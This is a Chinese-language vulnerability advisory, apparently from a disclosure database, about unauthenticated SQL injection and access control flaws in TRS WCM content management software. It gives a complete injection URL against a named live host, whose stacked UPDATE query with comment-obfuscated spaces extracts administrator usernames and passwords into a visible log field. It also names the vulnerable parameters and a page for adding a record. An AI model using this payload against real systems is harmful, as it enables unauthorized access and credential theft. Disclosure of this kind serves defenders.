TRS某些版本WCM5.2~WCM6.5?存在SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: TRS某些版本WCM5.2~WCM6.5?存在SQL注入,具体版本没测试,网上测试几个都存在。 不用登陆。 ### 详细说明: 首先是这个页面,好像是越权了 http://agent.trs.cn/portal/db/dbupdatelog_list.jsp 正常应该要登陆才能看吧? 直接注入 http://agent.trs.cn/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG 注:存在注入参数为:OrderType 和 OrderField 即把查询记录显示在结果里,要是没有记录,可以自己加一条 http://agent.trs.cn/portal/db/dbupdatelog_addedit.jsp 另,源码在这里存在: http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp ### 漏洞证明: [<img src="https://images.seebug.org/upload/201303/08155349e4f02779549c9d9daefa125d48a9fd98.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/08155349e4f02779549c9d9daefa125d48a9fd98.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息